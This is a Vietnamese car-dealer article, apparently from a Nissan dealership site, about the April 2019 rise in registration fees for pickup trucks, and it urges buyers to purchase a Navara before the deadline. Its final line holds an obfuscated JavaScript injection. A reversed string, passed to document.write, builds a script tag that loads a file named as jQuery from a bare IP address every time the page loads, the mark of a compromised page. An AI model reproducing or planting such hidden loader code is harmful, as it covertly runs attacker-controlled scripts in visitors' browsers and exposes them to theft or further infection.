Tăng phí trước bạ xe bán tải từ tháng 4

Trước thông chính thức áp dụng tăng phí trước bạ lên đến hàng chục triệu đồng với dòng xe bán tải kể từ ngày 10/4/2019, thị trường ô tô vẫn rất nhộn nhịp .

Theo đó những dòng xe 5 chỗ ngồi trở xuống, có khối lượng chuyên chở cho phép dưới 1.500 kg, mức thu lệ phí trước bạ lần đầu sẽ bằng 60% mức lệ phí trước bạ của ôtô con. Ở lần nộp lệ phí trước bạ lần thứ hai trở đi, mức thu là 2% và áp dụng thống nhất trên toàn quốc. Mức đóng này cao hơn so với hiện hành.

nissan-le-van-luong

Cụ thể, mức lệ phí trước bạ xe bán tải đang phải chịu là 2% và tới đây mức đóng này có thể cao hơn 3-4 lần. Chẳng hạn, phí trước bạ ôtô con là 10% thì mức phí với xe tải van sẽ là 6%, tăng gấp 3 so với hiện tại. Đồng nghĩa, số tiền nộp thêm tăng vài chục triệu đồng, tuỳ từng mẫu xe.

Cũng theo Nghị định, xe con có mức phí trước bạ lần đầu là 10%. Trường hợp cần áp dụng mức thu cao hơn cho phù hợp với điều kiện thực tế tại từng địa phương, Hội đồng nhân dân tỉnh, thành phố trực thuộc trung ương quyết định điều chỉnh tăng nhưng tối đa không quá 50% quy định chung. Như vậy mức thu tối đa các tỉnh, thành phố có thể áp dụng là 15%.

Nissan Navara là dòng xe sẽ chịu tác động từ quy định tăng phí lần này. Để tránh phát sinh chi phí nếu có đang có ý định mua xe bán tải thì không còn nhiều thời gian để quý khách hàng đắn đo chờ đợi nữa. Hãy nhanh tay sắm xe và hoàn thành các thủ tục trước ngày 10/4/2019. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))